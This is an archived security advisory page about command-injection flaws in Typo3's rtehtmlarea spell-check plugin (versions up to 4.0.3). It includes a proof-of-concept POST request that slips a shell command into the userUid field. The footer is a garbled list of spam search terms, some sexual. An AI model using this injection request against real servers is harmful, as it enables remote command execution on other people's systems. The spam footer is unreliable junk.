about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities


Title Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
Published 2006-12-20-12:00AM
Updated 2006-12-20-09:32PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  D. Fabian and J. Greil are credited with the discovery of these issues.
Vulnerable  Typo3 Typo3 4.0.3
Typo3 Typo3 4.0.2
Typo3 Typo3 4.0.1
Typo3 Typo3 3.7 .0
Typo3 Typo3 4.0
Typo3 Typo3 3.8
Not Vulnerable  Typo3 Typo3 4.0.4
Code   Attackers can exploit these issues via a web client.

The following proof-of-concept example is available:

POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-
check-logic.php?id=1 HTTP/1.1
Host: www.example.com
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+
/tmp/shell.txt+%23&enablePersonalDicts=true
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 22:13:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.englis PHP Advanc dle SEX VIDIO emraan has www.18qt.c news for C F-Secure A t211t eGallery Brshlona-8 news for c news for c ip board 2 www.xoxo l /search/ex Gambar sex xxxxsex www.wolde. Lesbian po ?? ????? Crack Data XxxPk news for c sez www.cu-med www.Sexxxx ip board 2 saxmmovies Www Zoosex www.asspor OpenSSL d sexygarls www.aptrik proftpd mo FREE DOWNL orgas ghost onli www.adultv /search/ex aflam arab kaspersky www.yxwyfc bay love netscape Vidos sexy t211t lo168l search/exp playgamehi